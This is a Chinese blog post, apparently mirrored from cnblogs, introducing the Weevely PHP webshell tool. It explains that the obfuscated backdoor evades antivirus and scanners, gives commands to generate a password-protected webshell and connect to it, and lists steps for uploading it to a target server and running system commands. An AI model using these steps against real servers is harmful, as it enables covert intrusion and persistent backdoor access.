zoukankan      html  css  js  c++  java
  • Weevely使用方法以及通信流量分析

    Weevely简介

    weevely项目地址:点击查看
    weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。

    weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。

    Weevely安装运行

    v5pingan's Blog-Weevely(PHP菜刀)-环境搭建

    • 可以直接在kali上运行
    root@kali:/bin# weevely 
    

    Weevely使用方法

    • Linux

    生成Webshell

    //生成PHP-Webshell
    weevely.py generate [password] [back_door_path]
    //生成一个密码为"a"的php木马
    weevely generate a webshell.php
    

    连接后门木马

    //连接PHP后门:weevely.py URL [password] [cmd]cmd为可选
    weevely http://127.0.0.1/webshell.php a
    

    weevely实战利用

    1、利用weevely生成PHP-Webshell

    weevely generate a webshell.php
    

    2、上传Webshell到目标服务器

    3、weevely连接PHP-Webshell

    weevely http://192.168.2.100/webshell.php a
    

    4、weevely管理websehll,执行系统命令

    weevely流量分析

    声明

    严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合!

    参考链接

    v5pingan's Blog-Weevely(PHP菜刀)
    freebuf-Weevely命令传输分析
    weevely3后门分析

  • 相关阅读:
    委托与事件的关系
    分布式存储ceph——(1)部署ceph
    neutron二
    openstack第五章:cinder
    openstack第六章:dashboard
    openstack第一章:keystone
    openstack第二章:glance
    openstack第三章:nova
    openstack第四章:neutron— 网络服务
    openstack安装
  • 原文地址:https://www.cnblogs.com/renhaoblog/p/13201454.html
Copyright © 2011-2022 走看看